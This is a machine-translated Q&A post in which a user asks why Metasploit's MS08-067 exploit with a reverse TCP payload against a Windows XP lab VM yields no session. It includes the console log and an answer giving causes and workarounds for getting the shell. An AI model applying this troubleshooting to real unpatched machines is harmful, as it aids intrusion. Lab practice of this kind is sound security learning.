我有一个小的“实验室”试图在家里测试,我有我的主操作系统,在VM上我运行的是Windows XP SP3(ENG)。我使用ms08_067_netapi和reverse_tcp作为有效负载。当我使用exploit命令时,这就是我得到的。
[*] Started reverse TCP handler on 192.168.1.69:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
我可以理解的是,漏洞利用有效,但有效载荷无法运行。我做的第一件事是将端口从4444更改为80以防万一,防火墙阻止了有效负载。我得到了同样的答复,尝试将80和443作为LPORT。
你对我还能做些什么有什么建议吗?
答案 0 :(得分:3)
答案就在那个帖子里 简而言之,这种漏洞利用有很多原因:
目标已修补。 '不支持语言'来自目标的错误。 有效负载无法正确执行。 网络错误&#NAT;反向连接通过NAT'。 根据相同问题的经验,我建议您执行以下操作:
尽量不要使用虚拟机。 尝试远离反向连接的其他有效负载。 尝试其他版本的Windows XP。 更改系统语言'有时可行!'